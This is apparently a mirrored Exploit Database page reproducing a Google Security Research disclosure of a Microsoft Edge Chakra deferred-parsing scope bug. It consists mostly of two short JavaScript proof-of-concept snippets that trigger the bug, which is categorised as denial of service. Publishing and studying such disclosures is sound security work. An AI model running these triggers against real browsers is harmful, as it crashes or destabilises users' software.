Microsoft Edge Chakra – Deferred Parsing Makes Wrong Scopes (2)

• Exploit Database
• 37 阅读

• 作者： Google Security Research
  日期： 2018-01-17
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/43717/

• /*
  Since the PoC is only triggerable when the "DeferParse" flag enabled and requires a with statement, I think this is simillar toissue 1310 .
  
  PoC:
  */
  
  // Enable the flag using '\n'.repeat(0x1000)
  eval(`(function f() {
  with ({}) {
  (function () {
  print(f);
  })();
  }
  }());` + '\n'.repeat(0x1000));
  
  PoC 2:
  // ./ch poc.js -ForceDeferParse
  (function f() {
  with ({}) {
  (function () {
  print(f);
  })();
  }
  }());